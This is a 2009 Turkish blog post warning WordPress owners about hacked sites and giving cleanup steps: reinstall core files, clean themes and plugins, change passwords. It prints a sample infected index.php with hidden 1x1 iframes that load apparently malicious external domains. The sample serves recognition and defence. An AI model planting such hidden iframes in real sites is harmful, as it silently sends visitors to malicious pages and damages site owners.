Siteniz Gerçekten Hala Sizin mi ?

Web siteniz güvende mi? Eğer değilse birkaç gün içinde sitenizi google tarafından “zararlı siteler” kapsamına alınmış ve neredeyse tüm kodlara exploit eklenmiş halde bulabilirsiniz. Tecrübe konuşuyor! Eskiden “hackerlar” bir web web sitesini hacklediklerinde  önceden hazırladıkları siyah arkaplanlı index dosyalarını siteninkiyle değiştirirlerdi. Anlaşılan işler değişmiş. Artık sunucunuzdaki index.php, index.html, home.php gibi dosyalara görünmez iframe html kodları ekleyip  ziyaretçilerinize de ulaşmış oluyorlar. Eğer yeterince deneyimli değilseniz (yada internete girmiyorsanız) kodların farkına varamıyorsumuz. Google sayfalarınızı taradığında kötü niyetli sitelere bağlantılar eklendiğini üstelik bunları kullanıcının farkına varamayacağı bir şekilde yapıldığını görüyor ve sizi arama sonuçlarından neredeyse silip atıyor.
Kodların içine edilmiş hali aşağıdakine benziyor
<?php
/* Short and sweet */
define('WP_USE_THEMES', true);
require('./blog/wp-blog-
header.php');
echo "<iframe src=\"http://xtrarobotz.com/?click=BC0230\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://nipkelo.net/?click=E74A05\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
echo "<iframe src=\"http://internetcountercheck.com/?click=14784531\" width=1 height=1 style=\"visibility:hidden;position:absolute\"></iframe>";
?>
<iframe src="http://hotslotpot.cn/in.cgi?income65" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income66" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://hotslotpot.cn/in.cgi?income67" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://betworldwager.cn/in.cgi?income68" width=1 height=1 style="visibility: hidden"></iframe>
<iframe src="http://litecartop.cn/in.cgi?income70" width=1 height=1 style="visibility: hidden"></iframe>

Acil eylem planı !

İlk olarak wordpressin son sürümünü indirin ve sistem dosyalarını bir güzel yenileriyle değiştirin.
Sonra sonradan eklenen dosylardaki (tema, eklenti gibi) zararlı kodları temizleyin.
Web siteniz ile en ilgili olandan başlayıp bütün şifrelerinizi değiştirin. Kaliteli ve kullanışlı şifreleri üretmeyi öğrenin.
Bu biraz ironik ama windowsunuzu güvenli tutun.
Neyseki bu olay bir tek benim başıma gelmemiş. Eğer sizde bu durumla baş başa iseniz aşağıdaki linklerden faydalanabilirsiniz ;
http://wordpress.org/support/topic/263085
http://wordpress.org/support/topic/261886
http://ocaoimh.ie/2008/06/08/did-your-wordpress-site-get-hacked/

Is your site really yours? sloganıyla yola çıkan, web sayfanızdaki kodların güvenirliğini tarayan bir site http://www.unmaskparasites.com/

2 Comments

  1. Seçkin(XemBiLL) 24 Nisan 2009
  2. kriptontr 25 Nisan 2009

Leave a Reply

E-posta hesabınız yayımlanmayacak. Gerekli alanlar * ile işaretlenmişlerdir